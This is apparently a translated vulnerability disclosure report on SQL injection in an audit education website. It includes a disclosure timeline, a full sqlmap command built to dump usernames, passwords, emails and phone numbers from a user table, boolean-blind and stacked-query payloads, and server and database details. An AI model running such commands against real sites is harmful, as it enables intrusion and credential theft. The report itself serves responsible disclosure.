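2015-11-23: Details reported to the vendor; awaiting vendor handling
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public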
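China Audit Education Network (中国审计教育网) was jointly funded and established in June 2003 by experts, scholars and audit practitioners in China with long experience in audit theory research and audit education. Since its launch, it has taken as its mission advancing audit education in China and cultivating China's audit elite. After more than four years of effort, it has become a specialized, high-quality, international, first-class audit education and training platform, characterized by integrating, developing and sharing audit education and training resources, and combining audit education and training, audit theory research and software development, and international audit exchange and cooperation. As the largest information provider in China's audit industry, the site covers national audit, social audit, independent audit, ACCA training, CISA training, CIA training, CPA training, financial audit, management audit, computer audit and related topics. It has won unanimous praise from audit experts and practitioners for its timely and comprehensive audit training information and its rich, practical free audit resources, and has established good cooperative relationships with the National Audit Office, Nanjing Audit Institute, large domestic audit training institutions and well-known domestic accounting firms, forming an industry website with a distinct audit specialty that ranks among the top audit industry sites.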
Address: http://**.**.**.**/fagui_cont.asp?news_id=15711
python sqlmap.py -u "http://**.**.**.**/fagui_cont.asp?news_id=15711" -p news_id --technique=BS --random-agent --batch -D new_shenji -T dbo.Dv_User -C TruePassWord,UserAnswer,UserLastIP,UserName,UserPassword,UserMobile,UserEmail --dump --threads=10 --start 1 --stop 3
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=15711 AND 3547=3547

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: news_id=15711;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user: '**.**.**.**'
current user is DBA: False
database management system users [2]:
[*] sa
[*] **.**.**.**
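Add filtering.
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-11-27 11:18
CNVD confirmed and reproduced the situation described, and has notified the site's administrators by e-mail through their publicly listed contact channel; they are to provide a fix subsequently.
None yet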